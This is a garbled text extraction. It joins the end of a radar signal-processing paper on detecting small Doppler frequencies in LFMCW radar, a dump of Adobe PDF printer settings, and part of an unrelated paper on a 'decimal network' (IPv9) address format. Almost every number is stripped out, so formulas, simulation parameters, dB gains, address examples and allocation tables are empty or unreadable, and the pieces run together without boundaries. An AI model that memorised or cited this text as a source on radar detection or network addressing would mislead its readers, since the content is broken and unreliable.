the transfer function of the proposed filter can be written as: y zð Þ ¼ x zð Þ � : z� � � figure general block diagram of lfmcw radar using the proposed processor. full-size doi: . /peerj-cs. /fig- figure realization of the proposed filter processor. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ therefore, h zð Þ ¼ � : z� ( ) the proposed filter is chosen to enhance the detection capability of middle doppler target velocities which improved using maximization process in ahmed ( ) with approximately high complexity compared with that of the proposed filter. the simulation of the proposed processor performance and both sdlc/sdli processor and the traditional algorithm based on mti only is achieved and discussed in the next section. computer simulation performance of the proposed processor is evaluated using simulation based on matlab program. the performance is compared with that of both the traditional one and sdlc/sdli algorithm under the same conditions. it is assumed that, the generation waveform is sawtooth with the central frequency of lfmcw radar (fc) is ghz, bandwidth (b) is mhz, modulation period (tm) is μsec, number of range cells is , cells and number of doppler cells is cells. comparison between the proposed processor and the traditional one which uses d-fft processor is achieved as shown in fig. . to study the effect of the proposed filter, two scenarios could be applied. first one, for off-pin targets and the other for middle-pin targets. the simulation is performed for these cases under the same conditions to verify a fair comparison. off-pin targets the proposed filter has a great performance on the off-pin target detection. assume a target in doppler velocity equals ( . / )fm which is off-pin target which lies between doppler velocities ( / )fm and ( / )fm. the target can appear as two targets as in fig. a using the traditional algorithm. but after applying the proposed filter, the target is located at one pin only (at pin number ) or with doppler velocity equals ( / )fm as in fig. b which indicates that, the proposed filter can resolve the problem of off-pin targets and therefore enhance the signal detection. figure block diagram of the proposed processor compared with the traditional d-fft processor. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ middle-pin targets to evaluate the effect of the proposed filter on the traditional algorithm, a set of moving targets are presented at different doppler frequencies in noiseless environment ( / , / , / , / , / , / , / , / , / ) × fm. figure illustrates sdlc/sdli processor response compared with the traditional algorithm at different doppler frequencies. it is found that, there are no enhancement in target detection especially for middle-pin targets. figure represents the response of the proposed algorithm based on the designed filter processor compared with the traditional one at different doppler frequencies. it is clear that, the proposed processor based on filtering of the signal spectrum has a good performance for both off-pin targets and middle-pin targets compared with both the traditional and sdlc/sdli processor due to using the maximization selection. 
another aspect to evaluate the proposed processor is the detection performance using roc curve at different doppler frequencies as shown in figs. and . it is clear that, from fig. , the detection performance of the proposed processor is enhanced compared with both the traditional and sdlc/sdli processor by nearly db of slc/sdli processor and about db of the traditional algorithm at slow doppler target velocity of ( / )fm. figure illustrates that, the detection of the target enhanced figure response of fft algorithm. (a) before the proposed filter. (b) after the proposed filter. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ using the proposed processor by nearly db of slc/sdli processor and about db of the traditional algorithm at middle doppler target velocity of ( / )fm. hardware implmentation the implementation of the proposed processor is very important using fpga which indicates that it can operate in real-time applications. the implementation is designed for the processing stage which includes; dechirping process of swatooth signal, d-fft processor, proposed filter, mti, sdlc/sdli and cfar detection. xilinx kc dsp kit is used for implementation which includes kintex xc k t fpga chip which has , logic cell, dsp slices and about kbit ram (challenges & solutions, ). fpga board is equipped with an fmc daughter board that contains ti’s ads p / ads dual-channel -bit msps adc and ti’sdac dual channel -bit msps dac on a daughter board (abaco systems, ). the fft core parameters are figure response of the proposed processor. response of the proposed processor compared with the traditional one at different doppler frequencies. full-size doi: . /peerj-cs. /fig- figure response of sdlc. response of sdlc/sdli processor compared with the traditional one at different doppler frequencies. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ figure roc of the proposed processor for middle doppler target. roc of the proposed processor compared with that of sdlc/sdli and the traditional algorithms for middle doppler target at pfa of − . full-size doi: . /peerj-cs. /fig- figure roc of the proposed processor for slow doppler target. roc of the proposed processor compared with that of sdlc/sdli and the traditional algorithms for slow doppler target at pfa of − . full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ chosen to be; number of samples, input data width is bits, phase factor width is bits, and pipelined streaming, i/o is used. the hardware implementation is performed for both the proposed processor and traditional algorithm which based on sdlc/sdli. two targets are simulated at doppler velocity of pin ( / ) and the other target located at doppler frequency pin number ( / ) as shown in figs. and . from these figures, it is clear that, the output of the proposed processor can improve the slowly moving figure response of the proposed processor compared with that of both sdlc/sdli and traditional algorithms using fpga. full-size doi: . /peerj-cs. 
/fig- figure simulation results of target detection using fpga. (a) traditional algorithm. (b) proposed processor. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ target without any effect of other targets. the hardware specifications using xilinx kc dsp kit is summarized in table . the verification of the implementation is performed using chip scope for the two processors as shown in fig. . it is found that, the chip scope results met the simulation results as discussed before. conclusion in this article, detection of targets with small doppler frequencies has been enhanced using a proposed processor. the enhancement has performed based on filtering process focusing on the detection based on the traditional algorithm using d-fft processor and sdlc/sdli processor. there are two main problems for target detection with small doppler frequencies; first one, is the off-pin target detection which traditional algorithm cannot distinguish between these targets. the proposed processor can resolve this problem. second problem, is the detection of middle-pin targets which is the main problem for sdlc/sdli processor and this case has been overcame using maximization table fpga utilization resources of the proposed processor. hardware resources available resources used utilization (%) slice registers , , slice luts , , ramb e /fifo e s ramb e /fifo e s dsp e s figure chip scope result of the proposed processor. chip scope result of the proposed processor, sdlc/sdli and traditional responses. full-size doi: . /peerj-cs. /fig- ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ process but it suffer from high complexity. so, this problem can be resolved using the proposed algorithm based on a proposed filter as a head of the first fft processor with less complexity compared with maximization process. the performance of the proposed processor is examined compared with that of the traditional one and sdlc/sdli processor through these two points. the detection performance of these targets can be evaluated using roc curves at different target velocities and at low probability of false alarm. it is found that, the detection performance of the proposed processor is enhanced by nearly db of slc/sdli processor and about nearly db of the traditional algorithm at slow doppler target velocity and about nearly db of slc/sdli processor and db of the traditional algorithm at middle-doppler target velocity. the implementation of the proposed processor is achieved using fpga and chip scope. it is found that, it meets the simulation results. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � sameh ghanem conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: code is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. 
#supplemental-information. references abaco systems. . fmc for digital signal processing. austin: abaco systems. ahmed fm. . detection of targets with small apparent doppler frequencies in lfmcw radars. in: iop conference series: materials science and engineering. bristol: iop publishing ltd, . challenges d, solutions x. . kintex- fpga kc evaluation kit: versatile, high- performance base platform shortens time to market for series designs. san jose: xilinx, inc. hossiny mh, salem sg, ahmed fm, moustafa kh. . enhance lfmcw radar detection and complexity using adaptive recovery camp algorithm. in: first international workshop on deep and representation learning. cairo. piscataway: ieee, – . komarov iv, smolskiy sm. . fundamental of short range fm radar. norwood: artech house. ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lee ms, kim yh. . design and performance of a -ghz switch-antenna array fmcw radar system for automotive applications. ieee transactions on vehicular technology ( ): – doi . /tvt. . . levanon n, mozeson e. . radar signals. hoboken: john wiley & sons, inc. salem sg, ahmed fm, ibrahim mh, elbardawiny ah. . a proposed compressive sensing based lfmcw radar signal processor. international journal of engineering research & technology ( ):p –p . salem sg, ahmed fm, ibrahim mh, elbardawiny arh, elgayar s. . design and implementation of a new approach of lfmcw radar signal processing based on compressive sensing in azimuth direction. in: ieee radar conference (radarconf), philadelphia, pa, piscataway: ieee, – doi . /radar. . . skolnik mi. . introduction to radar systems. new york: third edition. winkler v. . range doppler detection for automotive fmcw radars. in: european radar conference. piscataway: ieee, – . ghanem ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /tvt. . http://dx.doi.org/ . /radar. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ enhancement of small doppler frequencies detection for lfmcw radar introduction lfmcw radar detection and processing the proposed processor computer simulation hardware implmentation conclusion references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . 
/colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . 
] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice international journal of advanced network, monitoring and controls volume , no. , design and research of new network address coding lai yufeng . state and provincial joint engineering lab. of advanced network, monitoring and control, china . 
school of computer science and engineering xi'an technological university xi'an, china e-mail: @qq.com xie jianping . chinese decimal network working group shanghai, china . shanghai decimal system network information e-mail: @ .cn cheng xiaowei . chinese decimal network working group shanghai, china . shanghai decimal system network information e-mail: xewei.cheng@em .net li yuyu shandong radio, television and network co., ltd. tai 'an branch e-mail: tagdjsb@ .com abstract—to solve a series of problems caused by address space and information security of contemporary internet, chinese scientists have proposed a new generation of network architecture. since the release of ipv rfc in , it has become the first widely used internet of things protocol due to its characteristics of easy implementation and good operability. it constitutes the basic protocol of current internet technology. however, due to the defects in address classification, address resources are largely wasted. as the scale of the internet continues to grow, especially the number of addresses used to surge, the address shortage has limited the internet further development. ipv has solved the problem of insufficient ipv addresses to some extent, but it is not widely for more than years used because it integrates the information of physical layer and application layer, which confuses the network layer and brings many security risks. based on the study of ipv and ipv , this paper proposes a new generation network architecture, which is designed from the aspects of addressing model, address writing, address prefix writing and address type. the address structure is compatible with ipv and ipv , so that the previous design results can be retained, fundamentally solve the space address and information security issues, and provide a new solution for the next generation of internet applications and research. keywords-network architecture; the network address; ipv ; ipv ; ipv preface because ipv addresses are allocated on a first-come-first-served, on-demand basis, the distribution imbalance makes address allocation flawed. with the continuous development of the internet (especially the explosive growth of the scale and the surge of address use), some inherent defects of ipv are gradually exposed, mainly focusing on address shortage. ipv does not provide encryption and authentication mechanisms to ensure the secure transmission of confidential data resources and other aspects. although the use of nat ("network address translation"), cidr ("classless inter-domain routing") and other technologies can alleviate the ipv doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , crisis to some extent. but in fact, it has not fundamentally solved the problem. at the same time, it will bring new problems in cost, quality of service, security and other aspects, posing greater challenges. to solve the problem of insufficient ipv addresses, scientists proposed ipv .however, due to the limitations of the technology era, there are many defects in the design of ipv address structure. not satisfied with the -bit address length, the designers did not follow the principle of transparency between different protocol layers and added the physical layer address and the application layer in the design of ipv address segment (the protocol of the network layer), which led to a series of fatal problems. 
"ipv " is an idea proposed in the early s by the ietf (the internet engineering task force) in the june issue of rfc to address the deficiencies in internet address domain names.in may , ietf unilaterally abandoned its cooperation with iso (international organization for standardization), disbanded tuba, the institute for ipv research, and terminated its organized research and development activities for ipv . however, no intellectual property rights and valuable technical data were formed in this research. inspired by rfc , xie jianping, a chinese expert, formed the chinese ipv research and development team with shanghai general chemical technology research institute as the gathering center. the difference between uppercase and lowercase indicates that the ipv developed in china is not a technical version following the internet. ip version (ipv ) is a new version of the internet protocol, also known as the decimal network, digital domain name. the decimal network technology protocol is developed independently by our country. the emergence of ipv fundamentally solves the problems of insufficient address and network security. i. new network address ipv a. network address internet addresses are assigned by icann(the internet corporation for assigned names and numbers ) .the association appoints three local organizations for the assignment of addresses: internic for north america, ripencc for europe and apnic for the asia pacific region. the purpose of uniform allocation is to ensure that the network address has global uniqueness, and the host address is assigned by the system administrator of each network. therefore, the uniqueness of the network address and the host address within the network ensures the uniqueness of the ip address. b. ipv ipv decimal network/digital domain name system (ipv ).based on the study of ipv and ipv , the following changes are proposed. ipv expands the address length to bits, reduces the network overhead by means of indefinite length and non-location, and guarantees the network security. this article defines the ipv address architecture, including a detailed description of the currently defined ipv address format. c. ipv header format the format design of ipv system header is shown in table . international journal of advanced network, monitoring and controls volume , no. , table i. ipv header format version number communication stream type stream label address length priority class traffic address the authentication absolute traffic payload length next head hop limit source address ( - bit ) destination address ( - bit ) time authentication code the design of table is explained below. ) version: -bit length, internet protocol version number. for ipv , this field must be . ) category: bits in length. bits high is used to specify the address length, the value is ~ , is the power of , the address length is byte ~ byte; the default value is bits. among them, is bits, is bits, is bits, is bits, is bits, is bits, is bits, is bits. the last five bits specify the communication class and authentication for the source and destination addresses. to is the priority value, where to is used to specify the priority class of the traffic; to are used to specify the communication method of authentication before communication. the address of packet sending is used for traffic control and whether authentication of source address and destination address is required. 
to are used to specify absolute traffic that will not fall back when congestion is encountered; for virtual circuits; and respectively assign audio and video, called absolute value, to ensure the uninterrupted transmission of audio and video. other values are reserved for later use. ) flow label: with a length of bits, it is used to identify packages belonging to the same business flow. ) net load length: the length is bits, including the net load byte length, that is, the number of bytes contained in the packet after ipv header. ) next header: the length is bits. this field indicates the protocol type in the field following the ipv header. ) hop limit: the length is bits, and this field will be reduced by one every time a node forwards a packet. ) source address: -bit bit ~ -bit bit, specifying ipv packet sender address. use of variable length and location method. ) destination address: the length is bit ~ bit, and the destination address of ipv packet is specified. use of variable length and location method. ) time: used to control the lifetime of the address in the header. ) authentication code: it is used to identify the authenticity of the address in the header. ii. ipv address space a. type of address ipv addresses specify -bit identifiers for interfaces and interface groups. there are three types of addresses: ) unicast. a single interface has an identifier. a packet sent to a unicast address is passed to an interface identified by that address. ) arbitrary cast. typically, a set of interfaces belonging to different nodes has an identifier. a packet sent to an arbitrary cast address is passed to an interface identified by that address that is the closest measured by the routing protocol distance. international journal of advanced network, monitoring and controls volume , no. , ) multicast. typically, a set of interfaces belonging to different nodes has an identifier. a packet sent to a multicast address is passed to all interfaces at that address. there are no broadcast addresses in ipv , and its functionality is being replaced by multicast addresses. in this article, fields within the address are given a specified name, such as "user." when the name is followed by an identifier (such as "user id"), it is used to represent the content of the name field. when a name is used with a prefix (such as "user prefix"), it represents all addresses up to and including this field. in ipv , any fields that are all " " and all " " are valid values unless specifically excluded. in particular, the prefix can contain a " " value field or end with a " ". b. addressing model all types of ipv addresses are assigned directly to the interface, not to the node.ipv unicast addresses belong to a single interface. because each interface belongs to a single node, a node of multiple interfaces, any of its unicast addresses can be used as the identifier for that node. all interfaces need at least one link local unicast address. a single interface can specify multiple ipv addresses (unicast, arbitrary cast, multicast) or ranges of any type. unicast addresses with greater link range are not required for interfaces that go from non-neighbor or to non-neighbor and are not the origin or destination of any ipv packets. this is sometimes used for point-to-point interfaces. there is one exception to this addressing model: handle the case of multiple physical interface implementations. 
if the state that emerges in the internet layer is an interface, a unicast address or a group of unicast addresses can be assigned to multiple physical interfaces. this is useful for load-sharing across multiple physical interfaces. current ipv extends the ipv model, with a subset prefix associated with a link. multiple subset prefixes can be specified to the same link. iii. text representations of ipv addresses this article has developed a way to represent ipv addresses, including ―brackets decimal‖ representation, "curly braces" representation, and "parentheses" representation. a. brackets decimal the bracket decimal can be expressed in the following two ways: the first method: bits are represented by "[]".the bits in "[]" are expressed in decimal and can be written in indefinite length. and you can omit the "[]" when writing in the browser. the second method :the -bit ipv address representation is in the form of "y[y] [y] [y] [y] [y] [y]". each y represents a -bit portion of the address and is represented in decimal. = , so each ―y‖ is a decimal number of ten digits. each digit that is distinct from the decimal system ranges from to .for example, the range of the first digit from the left is to , so that there will be no overflow. for example: [ [ [ [ [ [ [ in address representation, multiple consecutive zeros to the left of each decimal number can be omitted, but a decimal number that is completely zero needs to be represented by a zero. for example, the above address can be written as: [ [ [ [ [ [ [ to simplify the representation of addresses, successive all-zero fields in the address can be replaced by a pair of square brackets "[x]" (x is the number of international journal of advanced network, monitoring and controls volume , no. , segments in the all-zero field).for example, the above address can be abbreviated as: [ [ ][ [ another example: [ [ [ [ [ [ [ can be abbreviated as [ ] [ [ [ [ [ [ [ can be abbreviated as [ ] b. decimal braces this method divides the -bit address into four -bit decimal numbers represented by curly braces separating them. the representation is in the form of "z}z}z}z", where each ―z‖ represents a -bit portion of the address and is represented in decimal. it's exactly the same as ―y‖, and it's compatible with ―y‖. you can mix the two. this greatly facilitates the current compatibility of these ipv addresses in ipv .such as: z}z}z}z; z}z}y]y]y]y; z}z}y]y]y]d.d.d.d; z}z}z}y]d.d.d.d; z}z}z}y]j.j.j.j; in particular, the last address format is the most useful. such as: } } } ] . . . you can write it like this: { } ] . . . finally, it should be noted that in symbolic representation, the brackets and curly braces are used without distinction. that is, "{" and"} ", "[" and"] "are not dissimilar, since this will not cause any side effects and is more convenient for users. c. parentheses representation since ipv has an address length of bits, whether you use four or eight segments, there are still many bits in each segment. for example, with an -segment representation, each segment still has bits. this is what happens in a paragraph: ……] ]… … ……] ]… … such a situation is not only cumbersome input, and it is easy to lose less or more, the user is not conducive to the number of dazzling.for convenience, the parenthesis representation -- (k/l) is introduced.where "k" means or and "l" means the number of or .in this way, the above two examples can be abbreviated as: ……]( / ) ]…… ……] ( / )]…… d. 
text representation of address prefixes the ipv address scheme is similar to the super netting and cidr schemes of ipv in that the address prefix is used to represent the network hierarchy. on the representation of ipv address prefix, a representation similar to cidr is adopted, which is as follows: ipv address/address prefixes length. where, ipv address is written in ipv address representation. the address prefix length is the length of consecutive bits that form the address prefix from the left. at this point, it is important to note that ipv addresses use decimal numbers, but prefix length refers to binary. therefore, prefixes must be calculated carefully. in binary numbers is not intuitive, after consideration, it is considered that the ipv address prefix can be converted to hexadecimal is easier to understand, but the ipv address is still expressed in decimal numbers. for example, the -bit address prefixes [ [ [ [ [ [ can be expressed as: [ [ [ [ [ [ [ / or [ ] [ [ [ / or [ [ [ [ [ [ ]/ or [ ] [ [ ]/ international journal of advanced network, monitoring and controls volume , no. , note that in the representation of the address prefix, the ipv address portion must be legal. the ipv address to the left of the slash ―/‖ must be restored to the correct address. in this address prefix, you can see that the address prefix is in length. so, the prefix is really just the first bits of the entire address plus the first bits of paragraph ( times + = ).so the key is in the seventh paragraph of the address. this paragraph is expressed in hexadecimal as:―********‖. because in hexadecimal, one digit is bit, the prefix includes only the first two ―*‖. knowing this, you know that the value of this segment is (hex) ~ ffffff (hex), or ~ in decimal. (or this paragraph may be expressed in binary as: ―**** **** **** **** **** **** **** ****‖. because in binary, one bit is one bit, so the prefix includes the first eight ―*‖, the range of values in this section is ~ that is, decimal ~ .) the ipv address portion can be generated by a pure address prefix by appending a to its right, or it can be a real ipv address that contains the address prefix. for example, the address prefix in the above example can also be expressed as: [ ] [ [a[b/ ―a‖ is any decimal number between and , and ―b‖ is any decimal number between and . iv. ipv address type ) pure ipv address the form of this address is y[y[y[y[y[y[y[y each y represents a decimal integer from to = ) ipv addresses compatible with ipv the form of the address is y[y[y[y[y[y[y[d.d.d.d each y represents a decimal integer from to = . d represents a decimal integer between and from the original ipv . ) ipv addresses compatible with ipv the form of this address is: y[y[y[y[x:x:x:x:x:x:x:x each y represents a decimal integer from to = .the x represents a hexadecimal number that originally ipv ranged from to ffff. ) special compatibility address in order to upgrade from ipv and ipv to ipv smoothly, some compatible addresses are designed. among them, some ipv addresses are designed to be compatible with ipv addresses. to smooth the transition to ipv addresses, prefix these addresses appropriately. in order to make their representation more intuitive and avoid errors caused by negligence in writing, the abbreviation method is introduced: y[y[y[y[x:x:x:x:x:x:d.d.d.d where, each ―y‖ represents the address as bits, represented in decimal. each ―x‖represents the original ipv address of bits, in hexadecimal. 
each ―d‖ represents the original ipv address of bits, expressed in decimal.such as: [ [ [ [ [ [ [ can be written as: [ [ [ [e : b: : f d:d : : . . . or: [ ] e : b: : f d:d : : . . . such as: [ [ [ [ [ [ [ can be written as:[ ]:: . . . (analysis: ":" is ipv address compression form of the representation, multiple blocks of a single continuous sequence by the double colon symbol "::".decimal is expressed as . . . in decimal.) international journal of advanced network, monitoring and controls volume , no. , ) [] full decimal address in order to facilitate the logistics code and decimal address application. category number is recommended. in the power of to the power of , the method of fixed length and non-positioning is adopted according to the application needs. ) ipv address of transition period ipv can be compatible with ipv and ipv technical protocols for the internet, but ipv and ipv technical protocols cannot be anti-compatible with ipv .the concept of compatibility is parallel coexistence, gradual and moderate transfer of applications and data services, rather than direct replacement or replacement of existing protocols. in order to solve the problem of ipv smooth transition to ipv , considering the existing internet has invested a lot of money so far, we specially designed ipv 's transition address, and took out a segment to allocate ipv .small changes can be made to the current system, where ipv has a section of j.j.j.j. where each j represents a decimal number from to which is to .where the previous [ ] can be omitted in the middle of the local address, that is, local users (or designated users) can use j.j.j.j. to directly use and the original ipv d.d.d.d. distinction.at the same time, this part of the user in order to smooth the transition to full decimal can be allocated at the same time decimal. in order to improve the software and hardware in the future without the need to reallocate addresses, such as [ ] can be written as [ ] . . . in the region in an ip network can be directly written with . . . , so that the original terminal can be used.there should be new records in the ipv dns records for compatibility between the original user and the current user.the interim ipv address system can be modified to the original ipv system.meanwhile, the ipv header is used, but the version number is to distinguish the original ipv .however, the original terminal equipment may be used by user terminals in the territory. when the address length is bits when the class number is , the ipv physical address is discarded and the ipv host -bit address is used. the representation is decimal or dot decimal - . - as in hexadecimal ff.ff. when the class number is , the address length is bits, represented by decimal - and the corresponding character length or dot decimal - . - . - . - . - as in hexadecimal ff.ff.ff.ff when the class number is , the address length is bits, represented by decimal or the corresponding character length. when the class number is , the address length is bits, represented by decimal or the corresponding character length. when the class number is , the address length is bits, represented by decimal or the corresponding character length. when the class number is , the address length is bits, denoted by decimal or the corresponding character length. when the class number is , the address length is bits, denoted by decimal or the corresponding character length. when the category number is , the address length is bits, represented by decimal or the corresponding character length. 
when the class number is , the address length is an unfixed bit, represented by the corresponding decimal length or the corresponding character length. v. allocation of address pace specific types of ipv addresses are identified by the high boot bit field in the address. the length of these boot bit fields varies. in the protocol, they are called the format prefix fp. international journal of advanced network, monitoring and controls volume , no. , table ii. ipv address format prefix format prefix fp (n bits) address ( -n bits) table iii. ipv address format prefix format prefix fp (n bits) address ( -n bits) the following is an overview of the various address type prefixes. table iv. ipv address format prefix for the original allocation table address type format prefix (binary code) format prefix (decimal code range) proportion of address space reserved address —— / unassigned address —— / ipv decimal network working group —— / ipx reserved address —— / unassigned address segment —— / unassigned address segment —— / unassigned address segment —— / unassigned address segment —— / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / aggregable global unicast address — / unassigned address segment - / unassigned address segment — / geographical area unicast address — / geographical area unicast address — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / international journal of advanced network, monitoring and controls volume , no. , unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / unassigned address segment — / local link unary address — / station single address — / multi-address — / full decimal address — — the aggregate global unary address and the cluster address belong to the unary address, they do not have any difference in form, only in the propagation mode of the message is different. therefore, the same format prefix is used for the polymerizable monocular and cluster address assignments. the proposed network vendor monocular addresses and geographic area monocular addresses are merged into a polymerizable monocular address. both the local link unary address and the station unary address are used in the local scope. in order to facilitate the router to speed up the identification of these two kinds of addresses, two address format prefixes, and , were assigned to them respectively. because the processing method of multi-destination address on the router and host is quite different from the processing method of single-destination address and cluster address, an address format prefix was also assigned to the multi-destination address. the design also reserved address space for "decimal internet address and domain name decision and allocation organization" and ipx address. the corresponding address format prefix is and .some special addresses of ipv , such as unspecified addresses, local return addresses and ipv -compatible addresses, 